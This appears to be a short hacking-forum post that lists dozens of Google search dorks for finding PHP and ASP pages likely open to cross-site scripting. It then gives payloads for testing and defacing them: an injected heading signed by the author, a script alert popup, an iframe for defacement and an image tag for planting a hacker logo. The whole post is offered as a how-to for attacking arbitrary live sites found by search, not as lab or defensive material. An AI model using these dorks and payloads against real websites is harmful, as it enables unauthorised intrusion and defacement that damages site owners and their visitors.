Hi, there are some XSS Dorks to found some XSS Vulnerable sites, copy paste one of the dorks and paste that on google search box!
- inurl:".php?cmd="
- inurl:".php?z="
- inurl:".php?q="
- inurl:".php?search="
- inurl:".php?query="
- inurl:".php?searchstring="
- inurl:".php?keyword="
- inurl:".php?file="
- inurl:".php?years="
- inurl:".php?txt="
- inurl:".php?tag="
- inurl:".php?max="
- inurl:".php?from="
- inurl:".php?author="
- inurl:".php?pass="
- inurl:".php?feedback="
- inurl:".php?mail="
- inurl:".php?cat="
- inurl:".php?vote="
- inurl:search.php?q=
- inurl:com_feedpostold/feedpost.php?url=
- inurl:scrapbook.php?id=
- inurl:headersearch.php?sid=
- inurl:/poll/default.asp?catid=
- inurl:/search_results.php?search=
- inurl:com_feedpostold/feedpost.php?url=
- inurl:/products/orkutclone/scrapbook.php?id=
- inurl:/products/classified/headersearch.php?sid=
- inurl:/poll/default.asp?catid=
- inurl:/search_results.php?search=Search&k=
- /preaspjobboard//Employee/emp_login.asp?msg1=
- pages/match_report.php?mid= pages/match_report.php?mid=
- /notice.php?msg= /notice.php?msg=
- /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
- /index.php?option=com_easygb&Itemid=
- /2wayvideochat/index.php?r=
- /view.php?PID= /view.php?PID=
- /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
- /showproperty.php?id= /showproperty.php?id=
- /vehicle/buy_do_search/?order_direction=
- /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
- /winners.php?year=2008&type= /winners.php?year=2008&type=
- /schoolmv2/html/studentmain.php?session=
- /site_search.php?sfunction= /site_search.php?sfunction=
- /search.php?search_keywords= /search.php?search_keywords=
- /hexjector.php?site= /hexjector.php?site=
- /news.php?id= /news.php?id=
- /index.php?view=help&faq=1&ref=
- inurl:"contentPage.php?id="
- inurl:"displayResource.php?id="
- intext:"Website by Mile High Creative"
- index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations"
- /info.asp?page=fullstory&key=1&news_type=news&onvan=
- /ser/parohija.php?id= /ser/parohija.php?id=
- /strane/pas.php?id= /strane/pas.php?id=
- /main.php?sid= /main.php?sid=
Some Strigns to test if is vulnerabile of XSS or not!
#1 Add a text format H1.
<h1>XSS Vuln by ASim ALi AnSaRi</h1>
#2 PopUp Box
<script>alert("ASim ALi AnSaRi")</script>
#3 Deface the website with iframe
<iframe src="URL_HERE" height=768 width=1024>
#4 Or just adding your logo of hack or any photo on website
<img src="url here" />